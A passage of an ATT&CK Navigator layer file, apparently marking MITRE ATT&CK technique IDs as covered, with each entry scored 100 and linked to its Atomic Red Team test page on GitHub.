s://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1047","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1055.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055.004","score":100,"enabled":true,"comment":"https://github.com/redcanar
yco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/ato
mic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1070.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.co
m/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1072","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redca
naryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1078.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1095","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/
atomic-red-team/blob/master/atomics/T1095/T1095.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1106","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1112","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1114.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1114","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.0
01/T1114.001.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1119","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"},{"techniqueID":"T1120","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"},{"techniqueID":"T1123","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"},{"techniqueID":"T1124","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"},{"techniqueID":"T1127.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1127","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1133","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"},{"techniqueID":"T1134.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1134","s
core":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1137.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1197","score":100,"enabled":true,"c
omment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1202","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"},{"techniqueID":"T1204.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1204","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1207","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"},{"techniqueID":"T1216.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1218.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/ato
mic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218.010","score":100,"enabled":true,"comment":"https://github.co
m/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"},{"techniqueID":"T1219","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"},{"techniqueID":"T1220","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"},{"techniqueID":"T1221","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"},{"techniqueID":"T1222.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1482","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1489","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T14
89.md"},{"techniqueID":"T1490","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"},{"techniqueID":"T1491.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1491","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1505.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techn
iqueID":"T1531","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"},{"techniqueID":"T1543.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1546.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"
techniqueID":"T1546.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546.013","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1547.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/
T1547.005.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1548.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1550.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomi
